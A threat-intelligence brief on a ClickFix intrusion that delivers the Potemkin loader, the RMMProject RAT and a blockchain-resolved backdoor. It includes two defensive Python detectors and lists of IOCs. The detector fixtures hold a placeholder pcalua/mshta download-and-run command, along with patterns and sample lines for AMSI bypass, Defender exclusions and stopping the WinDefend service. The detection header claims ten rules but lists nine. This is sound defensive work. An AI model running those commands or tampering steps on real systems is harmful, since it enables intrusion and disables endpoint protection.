Severity: high. July 2, 2026.

Potemkin Loader ClickFix Intrusion: Multi-Stage Campaign Deploying RMMProject RAT and Blockchain-Resolved Backdoor

In a confirmed hands-on intrusion spanning eleven endpoints, attackers gained initial access through a ClickFix lure served from a compromised website that directed victims to paste a command into the Windows Run dialog. The command abuses pcalua.exe as a LOLBIN to spawn mshta.exe with a remote HTA URL, which silently downloads and executes an MSI installer delivering the Potemkin loader. Potemkin is a compact custom loader that uses a deterministic domain generation algorithm built on XorShift32 to probe ten thousand candidate domains for active C2, reflectively loading its follow-on payload directly in memory once contact is made. The use of a shared DGA codebase between Potemkin and its second stage, RMMProject, suggests a single development team behind the campaign.
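The Run dialog entry point described above leaves a durable artifact: Explorer records whatever the user typed into Win+R under the RunMRU key of the user's registry hive, so a registry-value-set event on that key whose value names a LOLBIN or a remote URL is a high-signal detection (the "ClickFix-RunMRU-Registry-Write-with-Suspicious-Command" idea in the list at the end of this brief). The script below is an added example written for this page, not code from the source report or from any vendor product. The Sysmon Event ID 13 style records, the SID, hostnames and the lure URL are constructed placeholders, and the suspicious-token list is an assumption tuned to the pcalua.exe/mshta.exe chain the brief describes.

```python
import re

# Constructed sample records in the shape of Sysmon Event ID 13 (registry value
# set), flattened to "Field=Value" pairs separated by " | ". Not real telemetry:
# the SID, paths and lure URL are placeholders.
SAMPLE_EVENTS = [
    "EventID=13 | Image=C:\\Windows\\explorer.exe | TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a | Details=pcalua.exe -a mshta.exe https://lure.example.invalid/hte.hta\\1",
    "EventID=13 | Image=C:\\Windows\\explorer.exe | TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b | Details=notepad\\1",
    "EventID=13 | Image=C:\\Windows\\explorer.exe | TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList | Details=ab",
    "EventID=13 | Image=C:\\Program Files\\App\\setup.exe | TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App | Details=C:\\Program Files\\App\\app.exe",
]

# Matches any value under ...\Explorer\RunMRU\ and captures the value name.
RUNMRU_KEY = re.compile(r"\\Explorer\\RunMRU\\(?P<value>[^\\]+)$", re.IGNORECASE)

# Assumed token list: LOLBINs named in the brief plus anything that pulls remote
# content. A typical user does not type these into the Run dialog.
SUSPICIOUS_TOKENS = (
    "pcalua", "mshta", "powershell", "cmd /c", "http://", "https://",
    "curl ", "certutil", "bitsadmin", "regsvr32", "rundll32",
)


def parse_event(line: str) -> dict:
    """Split a flattened 'Field=Value | Field=Value' record into a dict.
    partition() keeps '=' characters that appear inside URLs intact."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return fields


def runmru_command(event: dict):
    """Return the command stored by a RunMRU write, or None if the event is not
    a RunMRU entry (the MRUList value only stores ordering, so it is skipped)."""
    match = RUNMRU_KEY.search(event.get("TargetObject", ""))
    if not match or match.group("value").lower() == "mrulist":
        return None
    command = event.get("Details", "")
    # Explorer appends a literal "\1" to every stored Run entry; strip it.
    return command[:-2] if command.endswith("\\1") else command


def matched_tokens(command: str) -> list:
    """Suspicious tokens present in the command, in list order."""
    lowered = command.lower()
    return [token for token in SUSPICIOUS_TOKENS if token in lowered]


def triage(lines) -> list:
    """Return one alert dict per RunMRU write that contains a suspicious token."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        command = runmru_command(event)
        if command is None:
            continue
        tokens = matched_tokens(command)
        if tokens:
            alerts.append({"image": event.get("Image"), "command": command, "tokens": tokens})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"ClickFix candidate via {alert['image']}: {alert['command']} (hit: {', '.join(alert['tokens'])})")
```

The value-name filter matters: RunMRU stores one value per history slot plus an `MRUList` ordering value, and only the slot values carry commands. Because the key lives in the user hive, the writing process is explorer.exe even when the pasted command is malicious, so the rule keys on the stored content rather than on the writer.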

RMMProject is a modular RAT framework embedding a LuaJIT scripting engine that gives the operator dynamic execution capability without recompiling the implant. Its capabilities cover browser credential and cookie theft across Chrome, Firefox, and Edge, an App-Bound Encryption bypass that injects a helper DLL into a spawned Chrome process to decrypt stored secrets from Chrome version 127 and later, remote desktop control on a hidden Windows desktop, process injection, and reflective module loading. Following RMMProject deployment, a second installer delivers EtherRAT: a Node.js-based backdoor that resolves its C2 server address by reading a value from an Ethereum smart contract, making the C2 channel resilient to domain takedowns since updates require only a low-cost blockchain transaction. A renamed Cloudflare tunnel binary provides an additional persistent inbound access channel.

What distinguishes this intrusion is the visible adaptability of the human operator once inside. Rather than running a fixed playbook, the attacker cycled through a progression of defense evasion techniques in response to Defender detections: beginning with disabling the Antimalware Scan Interface (AMSI) via .NET reflection, escalating to registry policy writes that stripped real-time protection, then adding exclusion paths via PowerShell, and ultimately terminating the Windows Defender service entirely when earlier attempts were blocked. This back-and-forth against endpoint defenses played out while the attacker simultaneously deployed a Chisel reverse proxy for network pivoting and spread the loader across eleven hosts using Impacket-style remote execution, compromising domain administrator credentials and reaching the domain controller. The attacker likely had hours of unobserved access on at least one endpoint before any telemetry existed, underscoring the risk of gaps in endpoint monitoring coverage.
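Each step of that evasion progression is detectable on its own, but the stronger signal is the sequence: several distinct Defender-tampering stages on one host within a short window is the fingerprint of an operator reacting to blocks rather than a one-off admin action. The code below is an added example written for this page, not from the source report or any vendor product. It classifies constructed PowerShell command-line and registry-write records into the four stages the brief names and then reports hosts where two or more stages occur within an hour. Hostnames, timestamps and the exclusion path are placeholders; the stage regexes are assumptions, and the AMSI sample line is deliberately truncated to the class and field names a detector keys on.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry, one record per line: "timestamp|host|kind|payload".
# kind is "ps" (PowerShell command line) or "reg" (registry value set, "key=data").
# Hosts, times and paths are placeholders, not data from the report.
SAMPLE_EVENTS = [
    '2026-07-02T10:01:05Z|WS07|ps|powershell.exe -nop -w hidden -c "... AmsiUtils ... amsiInitFailed ..."',
    "2026-07-02T10:06:40Z|WS07|reg|HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring=1",
    "2026-07-02T10:09:12Z|WS07|ps|Add-MpPreference -ExclusionPath C:\\Users\\Public\\stage",
    "2026-07-02T10:15:30Z|WS07|ps|Stop-Service -Name WinDefend -Force",
    "2026-07-02T10:20:00Z|WS12|ps|Get-MpComputerStatus",
    "2026-07-02T11:00:00Z|WS12|reg|HKCU\\Software\\Contoso\\App\\Theme=dark",
]

# Stage rules (assumed): name, event kind the rule applies to, pattern on the payload.
STAGES = [
    ("amsi_bypass", "ps",
     re.compile(r"amsiutils|amsiinitfailed|amsicontext|amsiscanbuffer", re.I)),
    ("rtp_disabled_by_policy", "reg",
     re.compile(r"\\Policies\\Microsoft\\Windows Defender\\.*(DisableRealtimeMonitoring|DisableAntiSpyware)=1$", re.I)),
    ("rtp_disabled_by_cmdlet", "ps",
     re.compile(r"Set-MpPreference.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("exclusion_added", "ps",
     re.compile(r"Add-MpPreference.*-Exclusion(Path|Process|Extension)", re.I)),
    ("service_terminated", "ps",
     re.compile(r"(Stop-Service|Set-Service|sc(\.exe)?\s+(stop|config)).*WinDefend", re.I)),
]


def parse(line: str) -> dict:
    """Parse one 'timestamp|host|kind|payload' record; payload may contain '|'."""
    ts, host, kind, payload = line.split("|", 3)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "kind": kind, "payload": payload}


def classify(event: dict):
    """Return the first matching stage name, or None for a benign record."""
    for name, kind, pattern in STAGES:
        if event["kind"] == kind and pattern.search(event["payload"]):
            return name
    return None


def tampering_chains(lines, window: timedelta = timedelta(hours=1)) -> dict:
    """Map host -> ordered list of distinct tampering stages seen within `window`
    of that host's first tampering event. Only hosts with two or more stages are
    returned; a single stage is left to the per-stage rules."""
    by_host = defaultdict(list)
    for line in lines:
        event = parse(line)
        stage = classify(event)
        if stage:
            by_host[event["host"]].append((event["ts"], stage))

    chains = {}
    for host, hits in by_host.items():
        hits.sort()
        start = hits[0][0]
        seen = []
        for ts, stage in hits:
            if ts - start <= window and stage not in seen:
                seen.append(stage)
        if len(seen) >= 2:
            chains[host] = seen
    return chains


if __name__ == "__main__":
    for host, stages in tampering_chains(SAMPLE_EVENTS).items():
        print(f"{host}: escalating Defender tampering -> {' > '.join(stages)}")
```

Two design points: registry-based and cmdlet-based real-time-protection disabling are separate stages because they appear in different telemetry (Sysmon registry events versus script-block or process-creation logs), and the chain detector keys on distinct stages rather than event counts, so a noisy but single-technique script does not inflate the alert.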

Indicators of compromise

SHA256 file hashes (5)
  • 2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b
  • 79f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b
  • 3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881ce
  • cd4e5e2c65b1660470d3446539ee68adf5faeece3eaeb46583623be9911ee145
  • 2ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3a

IP addresses (2)
  • 77.110.122.58
  • 213.165.41.26

Domains (5)
  • cl.distritovagas.com
  • sonra.eutialyson.com
  • anus-staylard.xyz
  • pestrear-lamp.xyz
  • resumeacceptable.com

URLs (2)
  • https://cl.distritovagas.com/hte.hta
  • https://sonra.eutialyson.com/inst24.msi

File names (5)
  • inst24.msi
  • cons_1.0.1.msi
  • hyper-v.ver
  • ek_kill_av.ps1
  • ek_disable_av.ps1

Detections (10)

  • ClickFix-RunMRU-Registry-Write-with-Suspicious-Command
  • ConHost Headless Spawning Node Process
  • WinDefend Service Termination via PowerShell
  • Windows Defender Protection Disabled via PowerShell or Registry
  • Scheduled Task Registering Binary from User-Writable Path
  • Non-Browser Process Connecting to Ethereum RPC
  • PUA - Chisel Tunneling Tool Execution
  • Detect reflective DLL injection or in-memory assembly loading without disk writes
  • Detect encoded PowerShell, download cradles, and AMSI bypasses